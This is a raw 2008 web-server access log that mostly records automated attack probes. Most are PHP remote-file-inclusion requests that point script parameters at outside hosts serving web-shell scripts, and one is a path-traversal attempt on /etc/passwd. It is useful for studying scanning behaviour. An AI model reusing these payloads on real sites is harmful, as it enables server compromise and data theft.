66.244.149.48 - - [15/Jan/2008:14:03:04 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.149.48 - - [15/Jan/2008:14:03:04 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.53.230.82 - - [15/Jan/2008:14:06:43 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://34639.webtest.goneo.de/ultrastats/include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
80.53.230.82 - - [15/Jan/2008:14:06:44 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://34639.webtest.goneo.de/ultrastats/include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
122.153.16.5 - - [15/Jan/2008:14:07:47 -0800] "GET /logs/access_071228.log/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.194.246 - - [15/Jan/2008:14:08:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tukangbecak.com/r57.pdf?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:14:08:41 -0800] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:14:08:41 -0800] "GET //includes/kb_constants.php?module_root_path=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:14:08:41 -0800] "GET /logs//includes/kb_constants.php?module_root_path=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.210.125 - - [15/Jan/2008:14:10:04 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [15/Jan/2008:14:10:04 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [15/Jan/2008:14:10:04 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.223.59 - - [15/Jan/2008:14:10:18 -0800] "GET /logs/access_071216.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [15/Jan/2008:14:10:19 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [15/Jan/2008:14:10:19 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.241.213 - - [15/Jan/2008:14:10:28 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.241.213 - - [15/Jan/2008:14:10:29 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.241.213 - - [15/Jan/2008:14:10:29 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.241.213 - - [15/Jan/2008:14:10:30 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.210.125 - - [15/Jan/2008:14:10:55 -0800] "GET /logs/access_071228.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.29.24 - - [15/Jan/2008:14:11:28 -0800] "GET /logs/access_070927.log HTTP/1.0" 200 42324 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.164 - - [15/Jan/2008:14:13:28 -0800] "GET /minamijewelry/?S=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
122.153.16.5 - - [15/Jan/2008:14:13:53 -0800] "GET /logs/access_071225.log/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.216.139 - - [15/Jan/2008:14:14:05 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.14.194 - - [15/Jan/2008:14:14:41 -0800] "GET /logs/access_071212.log//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.14.194 - - [15/Jan/2008:14:14:41 -0800] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.184.21 - - [15/Jan/2008:14:14:41 -0800] "GET /logs/access_071212.log/admin/addentry.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.21 - - [15/Jan/2008:14:14:43 -0800] "GET /admin/addentry.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.21 - - [15/Jan/2008:14:14:43 -0800] "GET /logs/admin/addentry.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:14:16:35 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:14:16:36 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:14:16:39 -0800] "GET /logs/access_071229.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.6.175.176 - - [15/Jan/2008:14:22:51 -0800] "GET /funny/ HTTP/1.1" 200 812 "http://www.google.com/search?hl=en&q=%22index+of%22+%22funny%22&btnG=Google+Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" "www.dmulk.com"
65.6.175.176 - - [15/Jan/2008:14:22:52 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" "www.dmulk.com"
65.6.175.176 - - [15/Jan/2008:14:23:04 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" "www.dmulk.com"
202.180.216.12 - - [15/Jan/2008:14:23:04 -0800] "GET /logs/access_071230.log/index1.php?choix=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [15/Jan/2008:14:23:08 -0800] "GET /index1.php?choix=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.6.175.176 - - [15/Jan/2008:14:23:20 -0800] "GET /funny/terryt1.wmv HTTP/1.1" 200 4065346 "http://www.dmulk.com/funny/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" "www.dmulk.com"
80.87.131.98 - - [15/Jan/2008:14:25:18 -0800] "GET /logs/index.php?option=com_jce&Itemid=&mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
80.87.131.98 - - [15/Jan/2008:14:25:18 -0800] "GET /index.php?option=com_jce&Itemid=&mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:14:28:25 -0800] "GET /logs/access.log/calendar//tools/send_reminders.php?includedir=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:14:28:25 -0800] "GET /calendar//tools/send_reminders.php?includedir=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:14:28:25 -0800] "GET /logs/calendar//tools/send_reminders.php?includedir=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:14:34:15 -0800] "GET /logs/access_071229.log/calendar//tools/send_reminders.php?includedir=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [15/Jan/2008:14:34:40 -0800] "GET /updater.php?lang_sel=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
68.143.105.93 - - [15/Jan/2008:14:34:40 -0800] "GET /logs/updater.php?lang_sel=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.194.85.182 - - [15/Jan/2008:14:34:50 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
82.194.85.182 - - [15/Jan/2008:14:34:50 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.232.108.82 - - [15/Jan/2008:14:36:34 -0800] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.108.82 - - [15/Jan/2008:14:36:34 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.108.82 - - [15/Jan/2008:14:36:34 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.6 - - [15/Jan/2008:14:37:31 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://heartlandcandles.org/cart/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.90.77.6 - - [15/Jan/2008:14:37:31 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://heartlandcandles.org/cart/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.25.150.206 - - [15/Jan/2008:14:41:39 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.210.125 - - [15/Jan/2008:14:41:51 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [15/Jan/2008:14:41:52 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [15/Jan/2008:14:41:52 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:14:42:11 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.87.131.98 - - [15/Jan/2008:14:42:27 -0800] "GET /logs/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
80.87.131.98 - - [15/Jan/2008:14:42:27 -0800] "GET /index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.24.142 - - [15/Jan/2008:14:42:41 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 40532 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.164.133.203 - - [15/Jan/2008:14:43:08 -0800] "GET //send_reminders.php?noSet=0&includedir=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.108.82 - - [15/Jan/2008:14:44:08 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.108.82 - - [15/Jan/2008:14:44:08 -0800] "GET //login.php?dir=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.108.82 - - [15/Jan/2008:14:44:08 -0800] "GET /logs//login.php?dir=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.137.155 - - [15/Jan/2008:14:44:18 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
88.84.137.155 - - [15/Jan/2008:14:44:18 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:14:46:22 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:14:46:23 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:14:46:23 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:14:46:49 -0800] "GET /logs/access_071219.log//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:14:46:52 -0800] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.21.95.220 - - [15/Jan/2008:14:46:57 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.15.194.246 - - [15/Jan/2008:14:48:43 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tukangbecak.com/r57.pdf?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:14:51:58 -0800] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:14:51:59 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.137.155 - - [15/Jan/2008:14:52:21 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
88.84.137.155 - - [15/Jan/2008:14:52:21 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:14:53:41 -0800] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.150.206 - - [15/Jan/2008:14:53:41 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.150.206 - - [15/Jan/2008:14:53:42 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:14:53:47 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:14:53:47 -0800] "GET //tools/send_reminders.php?includedir=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.6.23.122 - - [15/Jan/2008:14:54:07 -0800] "GET /logs/access_071215.log HTTP/1.0" 200 124992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.38.105.135 - - [15/Jan/2008:14:54:36 -0800] "GET //send_reminders.php?noSet=0&includedir=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:14:56:03 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.194.246 - - [15/Jan/2008:14:58:31 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tukangbecak.com/r57.pdf?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.194.246 - - [15/Jan/2008:14:58:31 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tukangbecak.com/r57.pdf?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:14:58:44 -0800] "GET //tools/send_reminders.php?includedir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:14:58:44 -0800] "GET /logs//tools/send_reminders.php?includedir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
193.164.133.203 - - [15/Jan/2008:15:01:46 -0800] "GET /logs/access.log//send_reminders.php?noSet=0&includedir=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.164.133.203 - - [15/Jan/2008:15:01:46 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.164.133.203 - - [15/Jan/2008:15:02:17 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.164.133.203 - - [15/Jan/2008:15:02:22 -0800] "GET /include.php?path[docroot]=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [15/Jan/2008:15:02:33 -0800] "GET /logs/access_071229.log/werbungFrame.php?do=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [15/Jan/2008:15:02:33 -0800] "GET /werbungFrame.php?do=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [15/Jan/2008:15:02:33 -0800] "GET /logs/werbungFrame.php?do=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:15:07:04 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.147.74 - - [15/Jan/2008:15:07:15 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://83.19.144.26/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [15/Jan/2008:15:07:15 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://83.19.144.26/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [15/Jan/2008:15:07:15 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://83.19.144.26/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.189.34 - - [15/Jan/2008:15:09:19 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.110.131.88 - - [15/Jan/2008:15:09:39 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
89.110.131.88 - - [15/Jan/2008:15:09:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
89.110.131.88 - - [15/Jan/2008:15:09:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.76.186.87 - - [15/Jan/2008:15:09:44 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [15/Jan/2008:15:09:47 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [15/Jan/2008:15:09:50 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.110.131.88 - - [15/Jan/2008:15:09:55 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
211.21.95.220 - - [15/Jan/2008:15:13:41 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
